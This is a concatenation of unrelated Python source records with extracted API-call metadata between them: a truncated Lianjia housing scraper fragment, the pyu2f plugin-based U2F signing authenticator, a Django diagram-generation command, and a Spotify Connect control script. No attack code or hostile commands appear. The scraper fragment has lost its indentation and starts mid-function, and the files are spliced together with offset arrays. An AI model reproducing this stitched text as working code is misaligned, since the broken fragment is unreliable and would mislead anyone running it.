"""
    Process the parsed data
:param data:
:return:
"""
if data is None:
return
    # Basic data handling
    # Fix housing-estate links that are not absolute URLs
if 'housing_estate_link' in data and not data['housing_estate_link'].startswith('https://'):
data['housing_estate_link'] = 'https://sh.lianjia.com' + data['housing_estate_link']
    # Data transformation
    # Extract the number of rooms from the house type
if 'house_type' in data:
data['house_type'] = (data['house_type'].split('室')[0], data['house_type'])
    # Store the data (appended to a CSV file generated per day)
with open(csv_file_path,
'a', encoding='utf-8', newline='') as f:
writer = csv.writer(f)
writer.writerow(data.values())
if __name__ == '__main__':
    # Initial set of tasks
    init_tasks = set([base_url + '/'] + ['{}/pg{}/'.format(base_url, i) for i in range(2, 101)])
    # Create the pipe used for communication between the jobs (processes)
    (data_reader, data_writer) = mp.Pipe(duplex=False)
    # Start the download job (write end)
    mp.Process(target=start_download_job, args=(data_writer, init_tasks)).start()
    # Start the parse job (read end)
mp.Process(target=start_parse_job, args=(data_reader,)).start()
logging.info('--running--')
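# Note on the open question in the module docstring (stopping once every target
# has been crawled): this file does not implement it. One sketch -- an assumption,
# not wired into the code above -- is to have the download job count outstanding
# URLs and push a sentinel such as None through both pipes when the count reaches
# zero, e.g.:
#
#   task_writer.send(None)   # download loop: `if urls is None: break`
#   data_writer.send(None)   # parse loop:    `if args is None: break`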
| [
"logging.basicConfig",
"multiprocessing.Process",
"pyquery.PyQuery",
"re.match",
"csv.writer",
"multiprocessing.cpu_count",
"requests.get",
"time.sleep",
"multiprocessing.Pool",
"multiprocessing.Lock",
"datetime.date.today",
"multiprocessing.Pipe",
"logging.info",
"logging.error"
]
| [((530, 539), 'multiprocessing.Lock', 'mp.Lock', ([], {}), '()\n', (537, 539), True, 'import multiprocessing as mp\n'), ((578, 599), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (597, 599), False, 'import datetime\n'), ((804, 916), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': '"""%(asctime)s - %(process)05d - %(levelname)s - %(message)s"""'}), "(level=logging.INFO, format=\n '%(asctime)s - %(process)05d - %(levelname)s - %(message)s')\n", (823, 916), False, 'import logging\n'), ((1204, 1222), 'multiprocessing.Pool', 'mp.Pool', (['pool_size'], {}), '(pool_size)\n', (1211, 1222), True, 'import multiprocessing as mp\n'), ((1309, 1330), 'multiprocessing.Pipe', 'mp.Pipe', ([], {'duplex': '(False)'}), '(duplex=False)\n', (1316, 1330), True, 'import multiprocessing as mp\n'), ((2927, 2959), 're.match', 're.match', (['list_page_pattern', 'url'], {}), '(list_page_pattern, url)\n', (2935, 2959), False, 'import re\n'), ((3091, 3116), 'pyquery.PyQuery', 'PyQuery', (['content'], {'url': 'url'}), '(content, url=url)\n', (3098, 3116), False, 'from pyquery import PyQuery\n'), ((3337, 3362), 'pyquery.PyQuery', 'PyQuery', (['content'], {'url': 'url'}), '(content, url=url)\n', (3344, 3362), False, 'from pyquery import PyQuery\n'), ((5095, 5118), 'multiprocessing.Pool', 'mp.Pool', (['(pool_size // 2)'], {}), '(pool_size // 2)\n', (5102, 5118), True, 'import multiprocessing as mp\n'), ((6430, 6451), 'multiprocessing.Pipe', 'mp.Pipe', ([], {'duplex': '(False)'}), '(duplex=False)\n', (6437, 6451), True, 'import multiprocessing as mp\n'), ((6643, 6670), 'logging.info', 'logging.info', (['"""--running--"""'], {}), "('--running--')\n", (6655, 6670), False, 'import logging\n'), ((6181, 6194), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (6191, 6194), False, 'import csv\n'), ((1173, 1187), 'multiprocessing.cpu_count', 'mp.cpu_count', ([], {}), '()\n', (1185, 1187), True, 'import multiprocessing as mp\n'), ((5007, 5021), 'multiprocessing.cpu_count', 'mp.cpu_count', ([], {}), '()\n', (5019, 5021), True, 'import multiprocessing as mp\n'), ((5557, 5573), 'logging.error', 'logging.error', (['e'], {}), '(e)\n', (5570, 5573), False, 'import logging\n'), ((6474, 6543), 'multiprocessing.Process', 'mp.Process', ([], {'target': 'start_download_job', 'args': '(data_writer, init_tasks)'}), '(target=start_download_job, args=(data_writer, init_tasks))\n', (6484, 6543), True, 'import multiprocessing as mp\n'), ((6574, 6629), 'multiprocessing.Process', 'mp.Process', ([], {'target': 'start_parse_job', 'args': '(data_reader,)'}), '(target=start_parse_job, args=(data_reader,))\n', (6584, 6629), True, 'import multiprocessing as mp\n'), ((1150, 1164), 'multiprocessing.cpu_count', 'mp.cpu_count', ([], {}), '()\n', (1162, 1164), True, 'import multiprocessing as mp\n'), ((2220, 2237), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (2232, 2237), False, 'import requests\n'), ((2690, 2703), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (2700, 2703), False, 'import time\n'), ((4984, 4998), 'multiprocessing.cpu_count', 'mp.cpu_count', ([], {}), '()\n', (4996, 4998), True, 'import multiprocessing as mp\n')] |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class to offload the end to end flow of U2F signing."""
import base64
import hashlib
import json
import os
import struct
import subprocess
import sys
from pyu2f import errors
from pyu2f import model
from pyu2f.convenience import baseauthenticator
SK_SIGNING_PLUGIN_ENV_VAR = 'SK_SIGNING_PLUGIN'
U2F_SIGNATURE_TIMEOUT_SECONDS = 5
SK_SIGNING_PLUGIN_NO_ERROR = 0
SK_SIGNING_PLUGIN_TOUCH_REQUIRED = 0x6985
SK_SIGNING_PLUGIN_WRONG_DATA = 0x6A80
class CustomAuthenticator(baseauthenticator.BaseAuthenticator):
"""Offloads U2F signing to a pluggable command-line tool.
Offloads U2F signing to a signing plugin which takes the form of a
command-line tool. The command-line tool is configurable via the
SK_SIGNING_PLUGIN environment variable.
The signing plugin should implement the following interface:
Communication occurs over stdin/stdout, and messages are both sent and
received in the form:
[4 bytes - payload size (little-endian)][variable bytes - json payload]
Signing Request JSON
{
"type": "sign_helper_request",
"signData": [{
"keyHandle": <url-safe base64-encoded key handle>,
"appIdHash": <url-safe base64-encoded SHA-256 hash of application ID>,
"challengeHash": <url-safe base64-encoded SHA-256 hash of ClientData>,
"version": U2F protocol version (usually "U2F_V2")
},...],
"timeoutSeconds": <security key touch timeout>
}
Signing Response JSON
{
"type": "sign_helper_reply",
"code": <result code>.
"errorDetail": <text description of error>,
"responseData": {
"appIdHash": <url-safe base64-encoded SHA-256 hash of application ID>,
"challengeHash": <url-safe base64-encoded SHA-256 hash of ClientData>,
"keyHandle": <url-safe base64-encoded key handle>,
"version": <U2F protocol version>,
"signatureData": <url-safe base64-encoded signature>
}
}
Possible response error codes are:
NoError = 0
UnknownError = -127
TouchRequired = 0x6985
WrongData = 0x6a80
"""
def __init__(self, origin):
self.origin = origin
def Authenticate(self, app_id, challenge_data,
print_callback=sys.stderr.write):
"""See base class."""
# Ensure environment variable is present
plugin_cmd = os.environ.get(SK_SIGNING_PLUGIN_ENV_VAR)
if plugin_cmd is None:
raise errors.PluginError('{} env var is not set'
.format(SK_SIGNING_PLUGIN_ENV_VAR))
# Prepare input to signer
client_data_map, signing_input = self._BuildPluginRequest(
app_id, challenge_data, self.origin)
# Call plugin
print_callback('Please insert and touch your security key\n')
response = self._CallPlugin([plugin_cmd], signing_input)
# Handle response
key_challenge_pair = (response['keyHandle'], response['challengeHash'])
client_data_json = client_data_map[key_challenge_pair]
client_data = client_data_json.encode()
return self._BuildAuthenticatorResponse(app_id, client_data, response)
def IsAvailable(self):
"""See base class."""
return os.environ.get(SK_SIGNING_PLUGIN_ENV_VAR) is not None
def _BuildPluginRequest(self, app_id, challenge_data, origin):
"""Builds a JSON request in the form that the plugin expects."""
client_data_map = {}
encoded_challenges = []
app_id_hash_encoded = self._Base64Encode(self._SHA256(app_id))
for challenge_item in challenge_data:
key = challenge_item['key']
key_handle_encoded = self._Base64Encode(key.key_handle)
raw_challenge = challenge_item['challenge']
client_data_json = model.ClientData(
model.ClientData.TYP_AUTHENTICATION,
raw_challenge,
origin).GetJson()
challenge_hash_encoded = self._Base64Encode(
self._SHA256(client_data_json))
# Populate challenges list
encoded_challenges.append({
'appIdHash': app_id_hash_encoded,
'challengeHash': challenge_hash_encoded,
'keyHandle': key_handle_encoded,
'version': key.version,
})
# Populate ClientData map
key_challenge_pair = (key_handle_encoded, challenge_hash_encoded)
client_data_map[key_challenge_pair] = client_data_json
signing_request = {
'type': 'sign_helper_request',
'signData': encoded_challenges,
'timeoutSeconds': U2F_SIGNATURE_TIMEOUT_SECONDS,
'localAlways': True
}
return client_data_map, json.dumps(signing_request)
def _BuildAuthenticatorResponse(self, app_id, client_data, plugin_response):
"""Builds the response to return to the caller."""
encoded_client_data = self._Base64Encode(client_data)
signature_data = str(plugin_response['signatureData'])
key_handle = str(plugin_response['keyHandle'])
response = {
'clientData': encoded_client_data,
'signatureData': signature_data,
'applicationId': app_id,
'keyHandle': key_handle,
}
return response
def _CallPlugin(self, cmd, input_json):
"""Calls the plugin and validates the response."""
# Calculate length of input
input_length = len(input_json)
length_bytes_le = struct.pack('<I', input_length)
request = length_bytes_le + input_json.encode()
# Call plugin
sign_process = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout = sign_process.communicate(request)[0]
exit_status = sign_process.wait()
# Parse and validate response size
response_len_le = stdout[:4]
response_len = struct.unpack('<I', response_len_le)[0]
response = stdout[4:]
if response_len != len(response):
raise errors.PluginError(
'Plugin response length {} does not match data {} (exit_status={})'
.format(response_len, len(response), exit_status))
# Ensure valid json
try:
json_response = json.loads(response.decode())
except ValueError:
raise errors.PluginError('Plugin returned invalid output (exit_status={})'
.format(exit_status))
# Ensure response type
if json_response.get('type') != 'sign_helper_reply':
raise errors.PluginError('Plugin returned invalid response type '
'(exit_status={})'
.format(exit_status))
# Parse response codes
result_code = json_response.get('code')
if result_code is None:
raise errors.PluginError('Plugin missing result code (exit_status={})'
.format(exit_status))
# Handle errors
if result_code == SK_SIGNING_PLUGIN_TOUCH_REQUIRED:
raise errors.U2FError(errors.U2FError.TIMEOUT)
elif result_code == SK_SIGNING_PLUGIN_WRONG_DATA:
raise errors.U2FError(errors.U2FError.DEVICE_INELIGIBLE)
elif result_code != SK_SIGNING_PLUGIN_NO_ERROR:
raise errors.PluginError(
'Plugin failed with error {} - {} (exit_status={})'
.format(result_code,
json_response.get('errorDetail'),
exit_status))
# Ensure response data is present
response_data = json_response.get('responseData')
if response_data is None:
      raise errors.PluginError(
'Plugin returned output with missing responseData (exit_status={})'
.format(exit_status))
return response_data
def _SHA256(self, string):
"""Helper method to perform SHA256."""
md = hashlib.sha256()
md.update(string.encode())
return md.digest()
def _Base64Encode(self, bytes_data):
"""Helper method to base64 encode, strip padding, and return str
result."""
return base64.urlsafe_b64encode(bytes_data).decode().rstrip('=')
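# Illustrative sketch (not part of the original module): how the other side of
# the plugin protocol described above would frame a reply. Only the 4-byte
# little-endian length prefix plus JSON payload is prescribed by the interface;
# the helper name and the reply contents are assumptions.
def _example_frame_plugin_reply(reply_dict):
  encoded = json.dumps(reply_dict).encode()
  return struct.pack('<I', len(encoded)) + encoded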
| [
"hashlib.sha256",
"base64.urlsafe_b64encode",
"subprocess.Popen",
"json.dumps",
"os.environ.get",
"struct.pack",
"pyu2f.model.ClientData",
"struct.unpack",
"pyu2f.errors.U2FError"
]
| [((2908, 2949), 'os.environ.get', 'os.environ.get', (['SK_SIGNING_PLUGIN_ENV_VAR'], {}), '(SK_SIGNING_PLUGIN_ENV_VAR)\n', (2922, 2949), False, 'import os\n'), ((5811, 5842), 'struct.pack', 'struct.pack', (['"""<I"""', 'input_length'], {}), "('<I', input_length)\n", (5822, 5842), False, 'import struct\n'), ((5933, 6001), 'subprocess.Popen', 'subprocess.Popen', (['cmd'], {'stdin': 'subprocess.PIPE', 'stdout': 'subprocess.PIPE'}), '(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n', (5949, 6001), False, 'import subprocess\n'), ((8145, 8161), 'hashlib.sha256', 'hashlib.sha256', ([], {}), '()\n', (8159, 8161), False, 'import hashlib\n'), ((3724, 3765), 'os.environ.get', 'os.environ.get', (['SK_SIGNING_PLUGIN_ENV_VAR'], {}), '(SK_SIGNING_PLUGIN_ENV_VAR)\n', (3738, 3765), False, 'import os\n'), ((5099, 5126), 'json.dumps', 'json.dumps', (['signing_request'], {}), '(signing_request)\n', (5109, 5126), False, 'import json\n'), ((6255, 6291), 'struct.unpack', 'struct.unpack', (['"""<I"""', 'response_len_le'], {}), "('<I', response_len_le)\n", (6268, 6291), False, 'import struct\n'), ((7352, 7392), 'pyu2f.errors.U2FError', 'errors.U2FError', (['errors.U2FError.TIMEOUT'], {}), '(errors.U2FError.TIMEOUT)\n', (7367, 7392), False, 'from pyu2f import errors\n'), ((7459, 7509), 'pyu2f.errors.U2FError', 'errors.U2FError', (['errors.U2FError.DEVICE_INELIGIBLE'], {}), '(errors.U2FError.DEVICE_INELIGIBLE)\n', (7474, 7509), False, 'from pyu2f import errors\n'), ((4248, 4324), 'pyu2f.model.ClientData', 'model.ClientData', (['model.ClientData.TYP_AUTHENTICATION', 'raw_challenge', 'origin'], {}), '(model.ClientData.TYP_AUTHENTICATION, raw_challenge, origin)\n', (4264, 4324), False, 'from pyu2f import model\n'), ((8357, 8393), 'base64.urlsafe_b64encode', 'base64.urlsafe_b64encode', (['bytes_data'], {}), '(bytes_data)\n', (8381, 8393), False, 'import base64\n')] |
import itertools
import os
from django.conf import settings
from django.core.management import call_command
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = 'Generates class diagrams.'
def handle(self, *args, **options):
if 'django_extensions' not in settings.INSTALLED_APPS:
exit('django_extensions not found, try using --setting kive.UML_settings')
docs_path = os.path.join(os.path.pardir, 'docs', 'models')
apps = [app for app in settings.INSTALLED_APPS
if not (app.startswith('django') or app == 'rest_framework')]
apps.sort()
for app in apps:
print(app)
exclude_models = ['User', 'Group']
if app != 'metadata':
exclude_models.append('AccessControl')
call_command("graph_models",
app,
pygraphviz=True,
group_models=True,
outputfile=os.path.join(docs_path, app+'.png'),
exclude_models=','.join(exclude_models))
readme_path = os.path.join(docs_path, 'README.md')
with open(readme_path, 'rU+') as f:
models_section = '### Models ###\n'
header = itertools.takewhile(lambda line: line != models_section,
f.readlines())
f.seek(0)
for line in header:
f.write(line)
f.write(models_section)
for app in apps:
f.write('#### {} ####\n'.format(app))
                f.write('![{}]({}.png)\n\n'.format(app, app))
| [
"os.path.join"
]
| [((442, 488), 'os.path.join', 'os.path.join', (['os.path.pardir', '"""docs"""', '"""models"""'], {}), "(os.path.pardir, 'docs', 'models')\n", (454, 488), False, 'import os\n'), ((1145, 1181), 'os.path.join', 'os.path.join', (['docs_path', '"""README.md"""'], {}), "(docs_path, 'README.md')\n", (1157, 1181), False, 'import os\n'), ((1019, 1056), 'os.path.join', 'os.path.join', (['docs_path', "(app + '.png')"], {}), "(docs_path, app + '.png')\n", (1031, 1056), False, 'import os\n')] |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import time
import json
import os
import sys
import urllib
import socket
import argparse
import requests
import lib.common as common
base_url = 'http://localhost:24879/player/'
#------------------------------------------------------------------------------#
# do something on startup #
#------------------------------------------------------------------------------#
def init():
global port
check_port()
script_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(script_path)
parser = argparse.ArgumentParser(description='media manager spotify connect service')
parser.add_argument('-p', '--port', type=int, help='WEB server port', required=True)
args = parser.parse_args()
port = args.port
#------------------------------------------------------------------------------#
# check if librespot-java is running #
#------------------------------------------------------------------------------#
def check_port():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('localhost', 24879))
if result == 0:
sock.close()
return
print("Please check if SpoCon is configured correctly and running", file = sys.stderr )
sock.close()
exit(1)
#------------------------------------------------------------------------------#
# get metadata from spotify #
#------------------------------------------------------------------------------#
def get_metadata():
meta_data = {}
global current_cover
try:
current_track = get_player()
album = current_track['item']['album']
current_cover = album['images'][0]['url']
tmp_cover = current_cover
tmp_cover=tmp_cover.replace('https://i.scdn.co/image/','')
meta_data['track'] = current_track['item']['name']
meta_data['album'] = album['name']
meta_data['artist'] = album['artists'][0]['name']
meta_data['cover'] = 'external_' + tmp_cover
meta_data['playstatus'] = get_play_status()
if meta_data['playstatus'] == False:
meta_data['track'] = ''
meta_data['album'] = ''
meta_data['artist'] = ''
meta_data['cover'] = 'images/pause.png'
return(bytes(json.dumps(meta_data), 'utf-8'))
    except Exception:
meta_data['track'] = ''
meta_data['album'] = ''
meta_data['artist'] = ''
meta_data['cover'] = 'images/pause.png'
meta_data['playstatus'] = False
return(bytes(json.dumps(meta_data), 'utf-8'))
#------------------------------------------------------------------------------#
# get play status #
#------------------------------------------------------------------------------#
def get_play_status(mode=False):
playing = False
ret_val = False
ret_str = 'NO'
try:
current_track = get_player()
playing = current_track['is_playing']
    except Exception:
        pass
if playing == True:
try:
path = 'http://localhost:24879/player/current/'
ret = requests.post(url = path)
data = ret.json()
if 'current' in data:
ret_str = 'YES'
ret_val = True
get_player()
        except Exception:
            pass
if mode:
return(bytes(ret_str, 'utf-8'))
return(ret_val)
#------------------------------------------------------------------------------#
# get whats currently playing #
#------------------------------------------------------------------------------#
def get_current():
path = 'http://localhost:24879/player/current/'
ret = requests.post(url = path)
return ret.json()
#------------------------------------------------------------------------------#
# get player data from API #
#------------------------------------------------------------------------------#
def get_player():
path = 'http://localhost:24879/web-api/v1/me/player'
ret = requests.get(url = path)
return ret.json()
#------------------------------------------------------------------------------#
# read cover image fom spotify connect web #
#------------------------------------------------------------------------------#
def read_cover_image():
webURL = urllib.request.urlopen(current_cover)
data = webURL.read()
return(data)
#------------------------------------------------------------------------------#
# play next song #
#------------------------------------------------------------------------------#
def next():
requests.post(url = base_url + 'next')
#------------------------------------------------------------------------------#
# play previuous song #
#------------------------------------------------------------------------------#
def prev():
requests.post(url = base_url + 'prev')
#------------------------------------------------------------------------------#
# start playing #
#------------------------------------------------------------------------------#
def play():
requests.post(url = base_url + 'resume')
#------------------------------------------------------------------------------#
# stop playing #
#------------------------------------------------------------------------------#
def pause():
requests.post(url = base_url + 'pause')
#------------------------------------------------------------------------------#
# handle http get request #
#------------------------------------------------------------------------------#
def respond_to_get_request(data):
if 'action' not in data:
return(bytes('failed', 'utf-8'))
if data['action'] == 'play':
play()
elif data['action'] == 'pause':
pause()
elif data['action'] == 'prev':
get_metadata()
prev()
elif data['action'] == 'next':
get_metadata()
next()
elif data['action'] == 'metadata':
return(get_metadata())
elif data['action'] == 'coverimage':
return(read_cover_image())
elif data['action'] == 'getplaystatus':
return(get_play_status(True))
return(bytes('OK', 'utf-8'))
#------------------------------------------------------------------------------#
# main program #
#------------------------------------------------------------------------------#
init()
common.http_get_handler = respond_to_get_request
common.run_http(port)
# Keep the process alive; run_http() is assumed to return after starting its server,
# with requests handled through the registered http_get_handler.
while True:
    time.sleep(2000)
| [
"requests.post",
"socket.socket",
"argparse.ArgumentParser",
"json.dumps",
"requests.get",
"time.sleep",
"os.chdir",
"lib.common.run_http",
"os.path.abspath",
"urllib.request.urlopen"
]
| [((7049, 7070), 'lib.common.run_http', 'common.run_http', (['port'], {}), '(port)\n', (7064, 7070), True, 'import lib.common as common\n'), ((587, 608), 'os.chdir', 'os.chdir', (['script_path'], {}), '(script_path)\n', (595, 608), False, 'import os\n'), ((622, 698), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""media manager spotify connect service"""'}), "(description='media manager spotify connect service')\n", (645, 698), False, 'import argparse\n'), ((1113, 1162), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (1126, 1162), False, 'import socket\n'), ((3909, 3932), 'requests.post', 'requests.post', ([], {'url': 'path'}), '(url=path)\n', (3922, 3932), False, 'import requests\n'), ((4286, 4308), 'requests.get', 'requests.get', ([], {'url': 'path'}), '(url=path)\n', (4298, 4308), False, 'import requests\n'), ((4614, 4651), 'urllib.request.urlopen', 'urllib.request.urlopen', (['current_cover'], {}), '(current_cover)\n', (4636, 4651), False, 'import urllib\n'), ((4954, 4990), 'requests.post', 'requests.post', ([], {'url': "(base_url + 'next')"}), "(url=base_url + 'next')\n", (4967, 4990), False, 'import requests\n'), ((5253, 5289), 'requests.post', 'requests.post', ([], {'url': "(base_url + 'prev')"}), "(url=base_url + 'prev')\n", (5266, 5289), False, 'import requests\n'), ((5552, 5590), 'requests.post', 'requests.post', ([], {'url': "(base_url + 'resume')"}), "(url=base_url + 'resume')\n", (5565, 5590), False, 'import requests\n'), ((5854, 5891), 'requests.post', 'requests.post', ([], {'url': "(base_url + 'pause')"}), "(url=base_url + 'pause')\n", (5867, 5891), False, 'import requests\n'), ((7087, 7103), 'time.sleep', 'time.sleep', (['(2000)'], {}), '(2000)\n', (7097, 7103), False, 'import time\n'), ((556, 581), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (571, 581), False, 'import os\n'), ((2441, 2462), 'json.dumps', 'json.dumps', (['meta_data'], {}), '(meta_data)\n', (2451, 2462), False, 'import json\n'), ((3296, 3319), 'requests.post', 'requests.post', ([], {'url': 'path'}), '(url=path)\n', (3309, 3319), False, 'import requests\n'), ((2695, 2716), 'json.dumps', 'json.dumps', (['meta_data'], {}), '(meta_data)\n', (2705, 2716), False, 'import json\n')] |
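The script above hands incoming requests to `respond_to_get_request()` through `lib.common`, whose HTTP layer is not part of this record. A minimal sketch, assuming the handler receives a dict parsed from a query string such as `?action=metadata`, of how that mapping could be produced:

# Sketch only: turning a query string into the dict respond_to_get_request() expects.
# How lib.common actually builds this dict is not shown in the record; this mapping is an assumption.
from urllib.parse import parse_qs

def query_to_request(query):
    parsed = parse_qs(query.lstrip("?"))
    # keep the first value for each parameter, e.g. {"action": "metadata"}
    return {key: values[0] for key, values in parsed.items()}

print(query_to_request("?action=metadata"))  # {'action': 'metadata'}
print(query_to_request("?action=play"))      # {'action': 'play'}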